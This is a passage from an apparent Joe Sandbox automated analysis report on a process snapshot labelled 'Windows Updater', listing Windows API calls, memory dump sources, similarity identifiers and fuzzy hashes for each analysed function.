                                                                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?), ref: 0009E599
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0009E5B6
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Window$CloseFileHandleShow$EventExceptionMessageModuleNameObjectOpenRaiseRegisterSingleUnmapViewWait
                                                                                                                                                                                                                                                                          • String ID: .bat
                                                                                                                                                                                                                                                                          • API String ID: 4248157538-24442780
                                                                                                                                                                                                                                                                          • Opcode ID: 62822a36e809dd42ba0a6835f1363d618b25af8af723f7d27489bc0df991f449
                                                                                                                                                                                                                                                                          • Instruction ID: 0a26bf989197ed634ba866a196719886996fabb8eec8aa082fd65ffee38517c6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62822a36e809dd42ba0a6835f1363d618b25af8af723f7d27489bc0df991f449
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D771EF31A00A55EBDF21DF68C845BAEBBE4EF14324F158269F814AB292DB71DD00CBD0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • OpenFileMappingW.KERNELBASE(00000004,00000000,?,?,8726ECAD,?,000B4AA0,?,?,00120D60), ref: 000B2495
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,000B4AA0,?,?,00120D60), ref: 000B24A2
                                                                                                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,000B4AA0,?,?,00120D60), ref: 000B24DD
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,000B4AA0,?,?,00120D60), ref: 000B24ED
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,000B4AA0,?,?,00120D60), ref: 000B255E
                                                                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,?,?,?,?,000B4AA0,?,?,00120D60), ref: 000B2572
                                                                                                                                                                                                                                                                          • OpenEventW.KERNEL32(00000002,00000000,?,?,?,?,?,?,000B4AA0,?,?,00120D60), ref: 000B259B
                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(00000000), ref: 000B25B6
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 000B25CC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$CloseErrorEventHandleLastOpenView$MappingUnmap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 228536551-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2df7fab11a426d53f04386fe95b2c01c0eb263d6ffad7b467d430c33e28bb006
                                                                                                                                                                                                                                                                          • Instruction ID: 976829c4a6d38c1f8e479d2180de69a0cde092924438f8dfc4bf688bc23e70b0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2df7fab11a426d53f04386fe95b2c01c0eb263d6ffad7b467d430c33e28bb006
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70517D74A00605DBDB20DF68CC49B9ABBB9EF04324F248369E824E76D1D774D9418FA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00064250: GetProcessHeap.KERNEL32 ref: 000642A5
                                                                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,00000010,00000000,00000100,00000002), ref: 000A050A
                                                                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,00000010,00000000,00000100,00000002), ref: 000A0561
                                                                                                                                                                                                                                                                          • GetPrivateProfileSectionNamesW.KERNEL32(00000000,00000100,?), ref: 000A0630
                                                                                                                                                                                                                                                                          • GetPrivateProfileSectionNamesW.KERNEL32(00000000,00000100,?), ref: 000A0682
                                                                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 000A07B5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: PrivateProfile$String$NamesSection$HeapProcessWrite
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 305312363-0
                                                                                                                                                                                                                                                                          • Opcode ID: 55926cfa0be30715a766edbbc623d67a246cb0df8cbf7349675cca0f8894419e
                                                                                                                                                                                                                                                                          • Instruction ID: 258f157d04cf84bfd01c433a98752ca7bae38fb27720883e5cf131c0514c2518
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55926cfa0be30715a766edbbc623d67a246cb0df8cbf7349675cca0f8894419e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FA1A075901209EFDB10DFA8CC49BAEBBF5FF45310F108569E415AB3A2DB75AA04CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(?,?,?,?,0008DE32,?,?,?,?,?,00000003,00000000,8726ECAD,?,?), ref: 0008E9D3
                                                                                                                                                                                                                                                                          • InternetConnectW.WININET(0008DE32,0008DE32,0008DE32,0008DE32,0008DE32,0008DE32,0008DE32), ref: 0008E9F6
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0008DE32,?,?,?,?,?,00000003,00000000,8726ECAD,?,?), ref: 0008EA00
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,0000000A,?,?,?,0008DE32,?,?,?,?,?,00000003,00000000,8726ECAD,?,?), ref: 0008EA31
                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,0008DE32,?,?,?,?,?,00000003,00000000,8726ECAD,?,?), ref: 0008EA56
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Event$ConnectErrorInternetLastObjectResetSingleWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3866874665-0
                                                                                                                                                                                                                                                                          • Opcode ID: 667a8787380e0fae7c18b5d7fdb4ca7d35bf91fa998c2168dd83d1d3449bf908
                                                                                                                                                                                                                                                                          • Instruction ID: 069b9bd02688e77cffcff710df93456def9ac81889f020174d94ee03e5b5f6b2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 667a8787380e0fae7c18b5d7fdb4ca7d35bf91fa998c2168dd83d1d3449bf908
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D11A032200780DAD770AB65E888B577BD4FB65726F10883EE0C782961C370F895D751
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,8726ECAD), ref: 000A040C
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,001039FD,000000FF), ref: 000A042A
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,00000004,?,00000000,?,?,?,?,001039FD,000000FF), ref: 000A0440
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,001039FD,000000FF), ref: 000A044A
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,001039FD,000000FF), ref: 000A0469
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3160720760-0
                                                                                                                                                                                                                                                                          • Opcode ID: 859d8475277823b307213e66cddac8899824217023b24813706eeebaa132d29f
                                                                                                                                                                                                                                                                          • Instruction ID: 5585c4124c477f0e7bccc7e8b271d414f3617ad0f8dac7e086b26644b4b6d32e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 859d8475277823b307213e66cddac8899824217023b24813706eeebaa132d29f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C11CB71904209EFD7308FA4DC05BAEBBB9F749B24F10822AFA11F76D0D7B059408790
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,000E5A17), ref: 000F003B
                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,000E5A17), ref: 000F007A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3328510275-0
                                                                                                                                                                                                                                                                          • Opcode ID: f1264b5a04d764a612995242d86a984c5a14185e95d01cb63db9c92e379b23d7
                                                                                                                                                                                                                                                                          • Instruction ID: a488b09e2d31083f0b88c4b658210503eed0f351a819091692a68d3d89bf4b7d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1264b5a04d764a612995242d86a984c5a14185e95d01cb63db9c92e379b23d7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2E0223B209A252AD26132393C8ABEB0A49CFC2331B150229FA0552683EE458C8300B0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,000F0D4E,?,00000000,?,?,000F0FEF,?,00000007,?,?,000F149A,?,?), ref: 000E82B7
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000F0D4E,?,00000000,?,?,000F0FEF,?,00000007,?,?,000F149A,?,?), ref: 000E82C2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                                                          • Opcode ID: a3fc0bd29eafa236c5bb714e9e97a385dc71c1bfa30842fba1844c7931995ad6
                                                                                                                                                                                                                                                                          • Instruction ID: a1f88c4462726c6e949726399bdbd9d57e1a83df2f16507c2daca58537e19611
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3fc0bd29eafa236c5bb714e9e97a385dc71c1bfa30842fba1844c7931995ad6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FE0CD31100704AFDB212FB1EC0D7963FD9EB40351F14C029F60CD69A2CA718881CBE4
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 0006D310: GetTempPathW.KERNEL32(00000104,?,8726ECAD,?), ref: 0006D35F
                                                                                                                                                                                                                                                                            • Part of subcall function 00064250: GetProcessHeap.KERNEL32 ref: 000642A5
                                                                                                                                                                                                                                                                            • Part of subcall function 0006C4A0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,80070057,8726ECAD), ref: 0006C4CD
                                                                                                                                                                                                                                                                            • Part of subcall function 0006C4A0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0006C504
                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00000000), ref: 000CE86C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$CreateDirectoryHeapPathProcessTemp
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 488741987-0
                                                                                                                                                                                                                                                                          • Opcode ID: 598b3df66e885f6353b227e3730d89ffcaee4cffe5b242deabb2c9d41a0e54dc
                                                                                                                                                                                                                                                                          • Instruction ID: a440573b891dcefa129269717e88b7474412f53a9aba815d6bb34aa5d5a5e188
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 598b3df66e885f6353b227e3730d89ffcaee4cffe5b242deabb2c9d41a0e54dc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3417071900649DFDB24DF68CC55BEEB7A9FF44320F14862DE8299B292DB749A04CF90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,000E5F73,?,000E98E3,?,00000000,?,000E1A83,00000000,000E5F73,00000004,?,00000000,?,000E5D6D), ref: 000E830D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5c9da794b9b23f04bf00949deabf549db9eb203a363acbc83d5b0f4f8ed12879
                                                                                                                                                                                                                                                                          • Instruction ID: 06b0889df1fa3d2965ccf8d6cba683dd298497cbcb00dd7edde0c6689237e8a5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c9da794b9b23f04bf00949deabf549db9eb203a363acbc83d5b0f4f8ed12879
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81E06D312012A29ED6712A779C09B9B7A99AF41FA4F558121FC0CF6592DF60CE4187E1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%